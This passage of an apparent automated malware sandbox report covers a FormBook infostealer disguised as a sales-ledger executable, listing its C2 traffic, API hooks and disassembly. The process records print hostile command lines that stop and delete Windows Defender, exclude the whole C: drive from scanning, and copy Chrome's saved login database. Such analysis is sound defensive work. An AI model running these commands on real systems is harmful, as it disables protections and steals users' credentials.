                                                                                                              Apr 12, 2021 14:41:19.812920094 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813088894 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.813091993 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813298941 CEST4973980192.168.2.3185.53.179.90
                                                                                                              Apr 12, 2021 14:41:19.813304901 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813344955 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.813507080 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.814652920 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.814677000 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.814692974 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.853662968 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.853730917 CEST8049739185.53.179.90192.168.2.3
                                                                                                              Apr 12, 2021 14:41:19.854041100 CEST8049739185.53.179.90192.168.2.3

                                                                                                              UDP Packets


                                                                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 14:41:17.185008049 CEST | 192.168.2.3 | 8.8.8.8 | 0xf110 | Standard query (0) | www.seniorlivingcaelderly.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:41:37.750791073 CEST | 192.168.2.3 | 8.8.8.8 | 0x9769 | Standard query (0) | www.soretyje.com | A (IP address) | IN (0x0001)

                                                                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 14:41:17.344877958 CEST | 8.8.8.8 | 192.168.2.3 | 0xf110 | No error (0) | www.seniorlivingcaelderly.com | | 185.53.179.90 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:41:37.835771084 CEST | 8.8.8.8 | 192.168.2.3 | 0x9769 | No error (0) | www.soretyje.com | | 81.17.18.194 | A (IP address) | IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.seniorlivingcaelderly.com

                                                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49737 | 185.53.179.90 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:41:17.437400103 CEST | 5700 | OUT | GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1
                                                                                                              Host: www.seniorlivingcaelderly.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
Apr 12, 2021 14:41:17.477700949 CEST | 5701 | IN | HTTP/1.1 403 Forbidden
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 12 Apr 2021 12:41:17 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 146
                                                                                                              Connection: close
                                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49738 | 185.53.179.90 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:41:19.604176998 CEST | 5702 | OUT | POST /suod/ HTTP/1.1
                                                                                                              Host: www.seniorlivingcaelderly.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 409
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.seniorlivingcaelderly.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.seniorlivingcaelderly.com/suod/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49739 | 185.53.179.90 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:41:19.649346113 CEST | 5716 | OUT | POST /suod/ HTTP/1.1
                                                                                                              Host: www.seniorlivingcaelderly.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 170153
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.seniorlivingcaelderly.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.seniorlivingcaelderly.com/suod/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate


                                                                                                              Code Manipulations

                                                                                                              User Modules

                                                                                                              Hook Summary

Function Name   Hook Type   Active in Processes
PeekMessageA    INLINE      explorer.exe
PeekMessageW    INLINE      explorer.exe
GetMessageW     INLINE      explorer.exe
GetMessageA     INLINE      explorer.exe

                                                                                                              Processes

                                                                                                              Process: explorer.exe, Module: user32.dll
Function Name   Hook Type   New Data
PeekMessageA    INLINE      0x48 0x8B 0xB8 0x8C 0xCE 0xEE
PeekMessageW    INLINE      0x48 0x8B 0xB8 0x84 0x4E 0xEE
GetMessageW     INLINE      0x48 0x8B 0xB8 0x84 0x4E 0xEE
GetMessageA     INLINE      0x48 0x8B 0xB8 0x8C 0xCE 0xEE

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:14:39:18
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
                                                                                                              Imagebase:0x500000
                                                                                                              File size:736256 bytes
                                                                                                              MD5 hash:C7C27E1859F1593AEDB1EEBF0A15175E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Start time:14:39:50
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 3%, Metadefender, Browse
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:14:39:54
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:14:39:55
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:14:40:02
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:14:40:07
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'powershell' Add-MpPreference -ExclusionPath C:\
                                                                                                              Imagebase:0x2d0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:14:40:07
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:14:40:08
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
                                                                                                              Imagebase:0x710000
                                                                                                              File size:736256 bytes
                                                                                                              MD5 hash:C7C27E1859F1593AEDB1EEBF0A15175E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 29%, ReversingLabs
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Start time:14:40:10
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:
                                                                                                              Imagebase:0x7ff714890000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:14:40:33
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                              Imagebase:0x960000
                                                                                                              File size:36864 bytes
                                                                                                              MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:14:40:43
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                                                                                                              Imagebase:0x380000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:14:40:43
                                                                                                              Start date:12/04/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DF70
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0106DFAD
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DFEA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0106E043
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DF70
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0106DFAD
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0106DFEA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0106E043
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000014,?,?,0395413C,02970B14,?,00000000), ref: 04E281DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E2270A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01067C89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04E24C71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01067C89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,?,?), ref: 04E2289D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378638983-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0106C156
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106C1D1,00000800,00000000,00000000), ref: 0106C3E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106E1BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106E1BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106C1D1,00000800,00000000,00000000), ref: 0106C3E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0106C156
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.314247692.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 995eb0c02eaeccc4ae13471fa4d4aceaeb6c9ae5fb9cfa2f173c735147ce8cc5
                                                                                                                • Instruction ID: 9fc41d72fd6cb30f5c27cc02f4bc2119b2a569487171ca269d92072cfcceb0ba
                                                                                                                • Opcode Fuzzy Hash: 995eb0c02eaeccc4ae13471fa4d4aceaeb6c9ae5fb9cfa2f173c735147ce8cc5
                                                                                                                • Instruction Fuzzy Hash: CC1113B1C006498FDB10CF9AC544BDEFBF8AB89224F10841AD469B7600D378A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,?,?), ref: 04E2289D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378638983-0
                                                                                                                • Opcode ID: 96beb41bd7eaacdec9218a719f8a01d9c2807d1bfeb26a38db7555874dc48b8c
                                                                                                                • Instruction ID: 3d00d8c6aaba907d1ce374bf2bff5eabd7c9c71a6cf1d9ae3b6819014210a459
                                                                                                                • Opcode Fuzzy Hash: 96beb41bd7eaacdec9218a719f8a01d9c2807d1bfeb26a38db7555874dc48b8c
                                                                                                                • Instruction Fuzzy Hash: CA1115B58002088FDB10CF99D585BDFBBF8FB48324F10841AE915A7300C374A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.318285078.0000000004E20000.00000040.00000001.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9c693c8ef658d7dbd585bf82e84c86a27fbb61ad469468a8c5d10c0355d3f66f
                                                                                                                • Instruction ID: fd88ba6c4e46d6d8b138b02174b05b2d6cc1b3c1e482492a0696e9b9ec787bea
                                                                                                                • Opcode Fuzzy Hash: 9c693c8ef658d7dbd585bf82e84c86a27fbb61ad469468a8c5d10c0355d3f66f
                                                                                                                • Instruction Fuzzy Hash: 6D12AAF2512746EAE712CF65F5B82893B61F745328B504328D1619BBE0DBBC2D4ACF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
